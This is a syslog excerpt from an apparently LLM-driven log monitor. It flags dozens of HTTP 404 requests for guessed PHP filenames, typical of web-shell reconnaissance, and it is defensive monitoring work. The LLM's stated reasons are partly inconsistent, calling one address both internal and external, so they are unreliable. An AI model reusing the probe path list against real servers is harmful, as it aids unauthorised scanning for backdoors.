Mar 20 12:47:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:32.011373 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:32.011411 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a php file (ws86.php) can indicate probing for vulnerable scripts or misconfigured endpoints. While not definitive, it warrants attention. Line=2026-03-20T12:46:02.788398414Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /ws86.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:37.442260 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:37.442296 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a PHP file returning 404 suggests potential probing for web shell or vulnerable paths.
Line=2026-03-20T12:46:02.856022501Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /xwx1.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:42.672399 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:42.672431 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /ggb.php suggests probing for a potential PHP file; could be automated scanning Line=2026-03-20T12:46:02.933022077Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /ggb.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:50.344099 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:50.344135 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A single request for a PHP file (/xff.php) resulting in 404 may indicate probing for sensitive files; not definitive malicious activity but warrants monitoring.
Line=2026-03-20T12:46:03.009959227Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /xff.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:57.198364 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:57.198399 [hints] Suggestion for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: field type "ip" seen in 35/20 lines, example: "4.204.200.32" → ""
Mar 20 12:47:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:57.198409 [hints] Suggestion for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: field type "timestamp" seen in 19/20 lines, example: "2026-03-20T12:46:03.077603153Z" → ""
Mar 20 12:47:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:57.198419 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a non-existent PHP file (wwx.php) returning 404, across a web service, suggests probing or unwanted scanning activity.
Line=2026-03-20T12:46:03.077603153Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /wwx.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:01.954498 [observer] Pipeline: processed=5265 pattern_hits=5130 llm_calls=135 llm_errors=3 learned=3
Mar 20 12:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:01.954532 [observer] Patterns: hash=5130 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=135
Mar 20 12:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:05.459344 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:48:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:05.459385 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:48:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:12.746126 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:48:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:12.746183 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=404 on a request to /ws77.php can indicate probing for vulnerable PHP files or misconfigured routes; not definitive malicious activity but warrants attention.
Line=2026-03-20T12:46:03.220820436Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /ws77.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:23.217933 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 12:48:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:23.217968 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to gifclass.php returning 404 from external IP suggests a probe or scan for a known file (gifclass.php). Not definitive malicious but warrants alerting. Line=2026-03-20T12:46:03.290176691Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /gifclass.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:29.820748 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:48:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:29.820781 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /8.php (a common probe for php info or vulnerability scanning) returning 404; could indicate reconnaissance activity.
Line=2026-03-20T12:46:03.367291351Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /8.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:31.934424 [observer] Pipeline: processed=5273 pattern_hits=5134 llm_calls=139 llm_errors=3 learned=3
Mar 20 12:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:31.934447 [observer] Patterns: hash=5134 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=139
Mar 20 12:48:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:35.964374 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:48:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:35.964412 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /155.php returning 404 could indicate probing for PHP files common in automated scans; not definitive but warrants monitoring.
Line=2026-03-20T12:46:03.435911954Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /155.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:43.803407 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.60 action=allow pattern_type=prefix
Mar 20 12:48:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:43.803444 [analyzer] Source hint mismatch: LLM says "webserver access_log", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:48:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:49.017697 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:48:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:49.017733 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to a common probe path (/222.php) returning 404 suggests a potential reconnaissance or probing activity from external IPs Line=2026-03-20T12:46:03.572582202Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /222.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:48:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:54.254714 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 12:48:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:48:54.254755 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:01.968454 [observer] Pipeline: processed=5279 pattern_hits=5136 llm_calls=143 llm_errors=3 learned=3
Mar 20 12:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:01.968532 [observer] Patterns: hash=5136 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=143
Mar 20 12:49:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:02.083836 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:49:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:02.083875 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for tool.php suggests possible probing or scanning activity; not definitive malicious but warrants investigation. Line=2026-03-20T12:46:03.706711412Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /tool.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:12.947600 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:49:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:12.947634 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Request to wp-act.php path with 404 response, indicative of WP vulnerability reconnaissance or probing. Line=2026-03-20T12:46:03.772621702Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /wp-act.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:18.927922 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:49:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:18.927956 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A 404 response for /cu.php in combination with a GET request from an internal IP suggests a potential probe or automated scanning for known vulnerable PHP files.
Line=2026-03-20T12:46:03.843355499Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /cu.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:26.319153 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:49:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:26.319212 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /fs.php with 404 could indicate probing for vulnerabilities; not definitive but warrants attention. Line=2026-03-20T12:46:03.909886055Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /fs.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:31.934495 [observer] Pipeline: processed=5285 pattern_hits=5138 llm_calls=147 llm_errors=3 learned=3
Mar 20 12:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:31.934522 [observer] Patterns: hash=5138 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=147
Mar 20 12:49:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:34.928540 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:49:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:34.928574 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on /asd.php from internal IP may indicate probing or misconfigured route; not definitive attack but worth alerting Line=2026-03-20T12:46:03.979324406Z 10.0.1.9 - - [20/Mar/2026:12:46:03 +0000] "GET /asd.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:40.323801 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:49:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:40.323852 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:49:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:44.915380 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:49:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:44.915424 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /ms.php returning 404 could indicate probing for PHP scripts or hidden endpoints; not definitive malicious activity but warrants monitoring. Line=2026-03-20T12:46:04.115360051Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /ms.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:49:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:56.197451 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:49:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:49:56.197577 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to jga.php returning 404 from an external IP could indicate probing for common PHP entrypoints.
Line=2026-03-20T12:46:04.181422041Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /jga.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:01.951231 [observer] Pipeline: processed=5293 pattern_hits=5142 llm_calls=151 llm_errors=3 learned=3 Mar 20 12:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:01.951261 [observer] Patterns: hash=5142 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=151 Mar 20 12:50:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:05.405352 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:50:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:05.405544 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to a suspicious path (/666.php) returning 404, which is a common probe for php files or web shells. Line=2026-03-20T12:46:04.247363254Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /666.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:50:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:13.348901 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:50:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:13.348938 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a PHP file path from an external IP suggests possible probing or accidental exposure; not definitive malware but warrants monitoring. 
Line=2026-03-20T12:46:04.314460547Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /zc-104.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:50:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:20.743398 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.68 action=alert pattern_type= Mar 20 12:50:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:20.743434 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a PHP file (ws88.php) from an external IP; could indicate probing or misconfigured path. Not definitive malware but warrants alert. Line=2026-03-20T12:46:04.386181183Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /ws88.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:50:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:26.344707 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 20 12:50:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:26.344743 [analyzer] Source hint mismatch: LLM says "webserver", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:31.940852 [observer] Pipeline: processed=5299 pattern_hits=5144 llm_calls=155 llm_errors=3 learned=3 Mar 20 12:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:31.940880 [observer] Patterns: hash=5144 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=155 Mar 20 12:50:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:34.697938 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:50:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:34.697973 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A 404 response for a 
request to /bo.php commonly indicates a probe for vulnerable scripts or misconfigurations; paired with external IPs in the log, this suggests potential probing activity. Line=2026-03-20T12:46:04.579616457Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /bo.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:50:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:41.060818 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:50:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:41.060854 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP request to a PHP endpoint returning 404; could indicate probing or misconfigured route. Not an immediate attack, but warrants attention. Line=2026-03-20T12:46:04.651107874Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /ws84.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:50:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:48.714867 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:50:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:48.714908 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET targeting a specific PHP file under public, resulting in 404. Could indicate probing for vulnerable paths or misconfigured public endpoints. 
Line=2026-03-20T12:46:04.717286829Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /public/vx.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:50:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:55.814421 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:50:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:50:55.814457 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /vanda.php could indicate automated probing for a known vulnerable script. Line=2026-03-20T12:46:04.783285610Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /vanda.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:01.951110 [observer] Pipeline: processed=5308 pattern_hits=5149 llm_calls=159 llm_errors=3 learned=3 Mar 20 12:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:01.951139 [observer] Patterns: hash=5149 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=159 Mar 20 12:51:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:07.285517 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:51:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:07.285552 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to /amp.php returning 404; could indicate probing for AMP pages or misconfigured route. Not malicious by itself, but warrants attention. 
Line=2026-03-20T12:46:04.849304035Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /amp.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:51:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:13.049773 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:51:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:13.049809 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /a4.php with external IP in a rapid, simple request pattern can indicate probing for vulnerable or misconfigured PHP files. Line=2026-03-20T12:46:04.915068120Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /a4.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:51:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:19.844678 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:51:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:19.844720 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /1.php 404 from internal IPs suggests probing or misconfiguration; not clearly malicious but warrants monitoring Line=2026-03-20T12:46:04.988510316Z 10.0.1.9 - - [20/Mar/2026:12:46:04 +0000] "GET /1.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:51:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:28.947505 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type= Mar 20 12:51:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:28.947546 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Public-facing GET /b.php returning 404 could indicate probing for known backdoor filenames; not definitely malicious but warrants scrutiny. 
Line=2026-03-20T12:46:05.054813271Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /b.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:31.936731 [observer] Pipeline: processed=5314 pattern_hits=5151 llm_calls=163 llm_errors=3 learned=3 Mar 20 12:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:31.936754 [observer] Patterns: hash=5151 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=163 Mar 20 12:51:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:34.540527 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:51:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:34.540566 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A 404 for a likely filename (hots.php) from a web request can indicate probing for common PHP scripts or mis-typed paths. Not definitive malicious activity but warrants alerts for potential scans. Line=2026-03-20T12:46:05.142585567Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /hots.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:51:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:39.622542 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:51:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:39.622576 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access log shows a request for wp-the.php returning 404, which is an unusual filename and could indicate probing for WordPress-related files. 
Line=2026-03-20T12:46:05.389705016Z 10.0.1.9 - - [20/Mar/2026:12:46:05 +0000] "GET /wp-the.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:51:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:46.597231 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 20 12:51:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:46.597272 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:51:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:53.473317 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.60 action=allow pattern_type=prefix Mar 20 12:51:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:51:53.473359 [analyzer] Source hint mismatch: LLM says "nginx_access", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:01.621805 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.55 action=alert pattern_type= Mar 20 12:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:52:01.621841 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a PHP file path (44.php) from a host may indicate probing for vulnerable or misnamed scripts. 
